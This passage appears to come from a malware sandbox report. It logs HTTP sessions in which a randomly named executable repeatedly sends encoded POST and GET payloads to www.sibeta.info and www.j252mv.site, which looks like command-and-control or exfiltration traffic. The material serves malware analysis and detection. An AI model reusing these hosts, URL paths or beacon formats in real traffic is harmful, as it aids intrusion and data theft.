Nov 4, 2024 10:12:29.937017918 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:29 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	162.0.231.203	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:31.770297050 CET	749	OUT	POST /4ecw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.sibeta.info Origin: http://www.sibeta.info Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.sibeta.info/4ecw/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 36 4f 33 72 42 79 6c 34 69 36 38 7a 7a 50 42 4b 7a 45 6b 66 6e 4d 75 4f 43 46 4f 67 32 6e 71 41 45 6d 76 67 6c 66 61 74 49 72 53 73 78 53 46 54 31 52 74 66 4e 2f 63 62 77 69 4c 59 74 71 41 4a 76 46 71 58 30 53 69 37 52 55 4c 6c 66 6a 54 74 48 32 5a 53 4b 31 74 53 37 55 44 63 39 44 77 74 4f 47 45 76 55 74 54 63 65 56 56 7a 51 72 5a 70 6f 79 66 49 4e 64 4e 57 59 79 6b 6f 30 56 47 30 74 6b 4e 61 68 74 42 68 41 6a 47 56 67 6a 5a 65 47 58 73 53 2f 4f 32 59 58 79 6d 67 57 59 6e 50 42 6a 35 42 58 77 58 57 72 31 6b 4f 47 78 47 44 71 7a 70 75 49 78 52 58 49 77 75 41 67 56 79 53 32 6a 50 44 39 58 56 77 56 55 6f 3d Data Ascii: Q8r=5f4cBaJJJuU46O3rByl4i68zzPBKzEkfnMuOCFOg2nqAEmvglfatIrSsxSFT1RtfN/cbwiLYtqAJvFqX0Si7RULlfjTtH2ZSK1tS7UDc9DwtOGEvUtTceVVzQrZpoyfINdNWYyko0VG0tkNahtBhAjGVgjZeGXsS/O2YXymgWYnPBj5BXwXWr1kOGxGDqzpuIxRXIwuAgVyS2jPD9XVwVUo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	162.0.231.203	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:34.316119909 CET	10831	OUT	POST /4ecw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.sibeta.info Origin: http://www.sibeta.info Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.sibeta.info/4ecw/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 36 4f 33 72 42 79 6c 34 69 36 38 7a 7a 50 42 4b 7a 45 6b 66 6e 4d 75 4f 43 46 4f 67 32 6e 69 41 45 77 7a 67 33 6f 75 74 4a 72 53 73 75 69 46 51 31 52 74 34 4e 2f 55 48 77 69 47 74 74 70 34 4a 76 6b 4b 58 34 7a 69 37 59 55 4c 6c 43 7a 54 67 44 32 5a 48 4b 31 63 62 37 55 7a 63 39 44 77 74 4f 41 34 76 46 34 76 63 5a 6c 56 77 5a 4c 5a 66 2f 43 66 73 4e 64 45 72 59 78 49 65 30 45 6d 30 74 45 64 61 6a 37 74 68 64 54 47 58 77 7a 5a 38 47 58 67 7a 2f 4b 66 68 58 79 43 65 57 66 58 50 42 48 45 6a 49 78 4c 51 78 6c 34 4f 53 69 37 69 6c 44 39 75 52 44 74 75 49 51 4f 69 39 56 6d 47 78 44 57 56 75 6e 70 44 41 42 4c 44 4e 72 70 59 51 43 4e 4f 4d 35 4b 36 57 69 33 57 77 71 79 6f 57 50 55 45 49 5a 4f 6e 4b 6f 2f 77 31 4a 36 4d 69 6c 4c 57 6a 31 79 50 39 67 72 62 74 34 64 63 79 62 64 43 4c 32 6e 38 4c 58 48 70 6f 4c 31 64 7a 6e 48 54 56 31 52 54 37 41 34 5a 43 35 64 52 63 51 73 36 4a 6a 73 72 67 58 36 6b 39 31 36 39 6a 58 49 43 63 4f 62 31 44 4e 55 52 66 35 5a 4c 42 77 [TRUNCATED] Data Ascii: Q8r=5f4cBaJJJuU46O3rByl4i68zzPBKzEkfnMuOCFOg2niAEwzg3outJrSsuiFQ1Rt4N/UHwiGttp4JvkKX4zi7YULlCzTgD2ZHK1cb7Uzc9DwtOA4vF4vcZlVwZLZf/CfsNdErYxIe0Em0tEdaj7thdTGXwzZ8GXgz/KfhXyCeWfXPBHEjIxLQxl4OSi7ilD9uRDtuIQOi9VmGxDWVunpDABLDNrpYQCNOM5K6Wi3WwqyoWPUEIZOnKo/w1J6MilLWj1yP9grbt4dcybdCL2n8LXHpoL1dznHTV1RT7A4ZC5dRcQs6JjsrgX6k9169jXICcOb1DNURf5ZLBw8P65T9oL7tyJD7yFML0/vRfsFpzozaFlc56i8b5zH9EK3mvW+nkOxp35k6UfOEpBIF88nOfZPiN3JTXGNvoznRUZMIIrfCtflL9pEzW6+xTA69Xor5DrzI7ZSQeDEGoAfKUhErYud1pYnYmGUKYGO1T/KyB2Iyo+mtNjlXQ94EmQv2xZjhOqlE2D5j6w+GjtTVPaXmv8Wuq/Jh8+4jx4KDepLcl5aSGRqOwhXjErSfuM6mXp4T2OWBNAdoX1kPPpB/Pek36cASfOG8in2PD3bSHaeG/wOhhgUCaIPvgX1L0DURXf6N+515KWDGgundAgSBDx9k1pDx+Q/FkaXi6Riz+c/Q5hK7W2KfIyF8qjqTEEnPGXe8rdSpsRZ89Rr43z4vLkKMI40IQ7mPVOp914WES8PS0VXjunlBC10rgrpXJqSw9uRALfj1PPQp9jZ9TUUsioMDRtkk/2BHpsFP7R5Ix3qlBxRSnLWxoU3jVlqwH6WGT93EqSoHT/oXh9Ux/xXzDQv0YsSF4a4meZFF7fpMQVMOz/zm+PAFRBjUX8HgED9cQOAVh6GhVFAQ+wxOKu5SDwV5voNME7GDja1iLBX+M9JJpe/ONfxV7oCTzoHTL50+tEEs0lsX5PoJkCSvCBja8X0UpyDAt6LjWrdImUuOY41iwKKWAQgO [TRUNCATED]
Nov 4, 2024 10:12:34.993571997 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:34 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	162.0.231.203	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:36.863676071 CET	463	OUT	GET /4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.sibeta.info Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:12:37.548274994 CET	548	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	150.95.254.16	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:43.092669964 CET	729	OUT	POST /0by3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.j252mv.site Origin: http://www.j252mv.site Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.j252mv.site/0by3/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 76 47 6d 6b 6b 50 30 68 38 64 6d 6d 56 49 71 30 75 79 33 71 64 73 53 72 74 30 47 46 6c 42 37 6f 58 63 46 69 2f 45 65 34 62 38 5a 74 68 72 68 68 2b 63 66 51 4b 56 72 38 47 49 4b 45 2b 34 71 37 75 46 54 4d 75 54 43 6b 4b 34 41 6b 72 34 5a 4e 4d 42 4d 76 30 4c 56 63 34 49 30 4c 58 33 66 48 73 62 73 78 2f 71 39 71 36 47 54 62 54 69 74 4e 58 61 6b 61 73 65 72 67 31 67 30 44 39 47 37 58 42 44 41 68 76 69 71 5a 33 67 58 42 4e 53 63 42 4a 34 62 49 41 78 55 77 72 36 66 6a 70 75 66 37 42 76 66 59 61 68 58 41 49 76 76 30 5a 65 31 31 46 6c 30 45 77 3d 3d Data Ascii: Q8r=TdvpDK38L/X11vGmkkP0h8dmmVIq0uy3qdsSrt0GFlB7oXcFi/Ee4b8Zthrhh+cfQKVr8GIKE+4q7uFTMuTCkK4Akr4ZNMBMv0LVc4I0LX3fHsbsx/q9q6GTbTitNXakaserg1g0D9G7XBDAhviqZ3gXBNScBJ4bIAxUwr6fjpuf7BvfYahXAIvv0Ze11Fl0Ew==
Nov 4, 2024 10:12:43.965040922 CET	213	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:43 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
Nov 4, 2024 10:12:43.965118885 CET	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
Nov 4, 2024 10:12:43.965128899 CET	24	IN	Data Raw: 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	150.95.254.16	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:45.647862911 CET	749	OUT	POST /0by3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.j252mv.site Origin: http://www.j252mv.site Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.j252mv.site/0by3/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 4d 65 6d 6c 46 50 30 6e 63 64 6e 37 6c 49 71 2f 4f 79 7a 71 64 67 53 72 73 77 57 46 54 78 37 6f 32 4d 46 6a 37 51 65 2f 62 38 5a 69 42 72 34 76 65 64 79 51 4b 51 55 38 44 49 4b 45 2b 73 71 37 75 56 54 4d 5a 48 46 6c 61 34 43 76 4c 34 62 48 73 42 4d 76 30 4c 56 63 34 63 4f 4c 57 66 66 48 63 72 73 33 62 65 2b 6a 61 47 55 4c 44 69 74 66 6e 61 6f 61 73 66 4f 67 78 68 66 44 2f 2b 37 58 45 48 41 67 2b 69 74 54 33 67 4f 66 39 53 50 4f 4d 5a 52 51 55 6f 70 2b 71 6d 49 73 62 32 59 7a 6e 69 46 4a 72 41 41 53 49 4c 63 70 65 58 42 34 47 59 39 66 77 64 76 53 6d 61 71 73 38 32 61 34 2f 67 33 69 75 65 31 2b 46 59 3d Data Ascii: Q8r=TdvpDK38L/X11MemlFP0ncdn7lIq/OyzqdgSrswWFTx7o2MFj7Qe/b8ZiBr4vedyQKQU8DIKE+sq7uVTMZHFla4CvL4bHsBMv0LVc4cOLWffHcrs3be+jaGULDitfnaoasfOgxhfD/+7XEHAg+itT3gOf9SPOMZRQUop+qmIsb2YzniFJrAASILcpeXB4GY9fwdvSmaqs82a4/g3iue1+FY=
Nov 4, 2024 10:12:46.548057079 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:46 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
Nov 4, 2024 10:12:46.548064947 CET	237	IN	Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83 Data Ascii: .com<PR></a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	150.95.254.16	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:48.190875053 CET	10831	OUT	POST /0by3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.j252mv.site Origin: http://www.j252mv.site Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.j252mv.site/0by3/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 4d 65 6d 6c 46 50 30 6e 63 64 6e 37 6c 49 71 2f 4f 79 7a 71 64 67 53 72 73 77 57 46 51 52 37 70 45 55 46 69 63 73 65 2b 62 38 5a 76 68 72 6c 76 65 64 4b 51 4f 30 51 38 44 4d 38 45 39 55 71 34 4e 4e 54 4f 6f 48 46 73 61 34 43 67 72 34 57 4e 4d 42 38 76 77 6e 52 63 34 4d 4f 4c 57 66 66 48 66 6a 73 33 50 71 2b 76 36 47 54 62 54 69 78 4e 58 62 2f 61 73 48 34 67 78 73 6b 43 50 65 37 58 6b 58 41 6a 4d 4b 74 4f 6e 67 62 65 39 54 53 4f 4d 64 53 51 56 41 79 2b 71 43 75 73 5a 71 59 77 48 76 50 55 4c 63 70 41 4f 66 6c 78 74 6e 31 31 46 45 4e 53 7a 70 54 57 44 2b 6d 2b 4e 32 45 36 49 31 67 79 75 65 6d 67 51 7a 6f 6a 64 37 4e 4d 57 35 79 48 6f 6a 54 62 6a 39 45 36 79 75 6f 53 53 39 35 6f 2b 2b 30 50 6f 6a 2f 2b 4c 6a 35 72 7a 4a 71 46 78 57 30 78 35 37 4f 75 66 74 72 58 61 53 6b 69 44 59 6c 6c 74 71 53 4b 45 4d 44 52 63 79 4f 35 73 51 61 61 33 4b 76 47 66 62 45 74 4f 6b 42 31 66 7a 45 2b 65 68 43 7a 51 75 61 68 42 49 4a 67 34 61 4d 43 72 76 55 65 78 67 32 57 46 [TRUNCATED] Data Ascii: Q8r=TdvpDK38L/X11MemlFP0ncdn7lIq/OyzqdgSrswWFQR7pEUFicse+b8ZvhrlvedKQO0Q8DM8E9Uq4NNTOoHFsa4Cgr4WNMB8vwnRc4MOLWffHfjs3Pq+v6GTbTixNXb/asH4gxskCPe7XkXAjMKtOngbe9TSOMdSQVAy+qCusZqYwHvPULcpAOflxtn11FENSzpTWD+m+N2E6I1gyuemgQzojd7NMW5yHojTbj9E6yuoSS95o++0Poj/+Lj5rzJqFxW0x57OuftrXaSkiDYlltqSKEMDRcyO5sQaa3KvGfbEtOkB1fzE+ehCzQuahBIJg4aMCrvUexg2WFdAtBB42NZC+Dp61w4te+APKkveq6uIY4K36Sy+QVe3h2HrqLpIfdOSlfam1Khrtn9k2KbuZAEX90QJQ+HyGWoMcb9+6o2BwwdBMLyge44E8zRJNUSmgQrS0kEekddyr083n0lRmABZVw9YAXzkFwXl/AgHOTrv4G1lpQgDATdwVZBDlrxUi71BxRrS6HrpFamd92oxXFfHyw2W8GVlMm3BpZcWtTfjZdd1fGD6JEDxnMMgES4WDwuis/iSdcCJvN0+X2xq7B9ztXjpB3dZkWiPSUIkwEz7XRRxI8w5RpeBWLf63xYl5nULv+Iqdt5NO4R0KMikTUihyuClSX+QML8eTvzKqho+MaeSoV+lKI1FrAg/zXytd4moW/IZjRhmQLytHI7QkoHn/GTorW9xWcWBFWZuF6R2yb2RR0gLauE5985vTNxVX7ELI5b4uzKi6DuCn9kYH923kwfElLpkY88mE6RN0L9pbFk9hCC/Bs6FQBuCeNPWFI32+G05T2slfH8+ZuaYNHhmObiYPZ4b1Pw2ZOtn0OxUJxecgrU2K+260+KeiPtnAdOjU5DW99q4GzUrouNZfY4tQv7k1dqD1nsh9iuoMp5VnaxuYCY62qAfpuNUAvKRqdxR8yEpYAO/iiBiZxUg3ob7kkOGGVIwHl2FT2fv4GaqpqDo [TRUNCATED]
Nov 4, 2024 10:12:49.047112942 CET	213	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:48 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
Nov 4, 2024 10:12:49.047303915 CET	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
Nov 4, 2024 10:12:49.047308922 CET	24	IN	Data Raw: 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	150.95.254.16	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:50.732224941 CET	463	OUT	GET /0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.j252mv.site Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
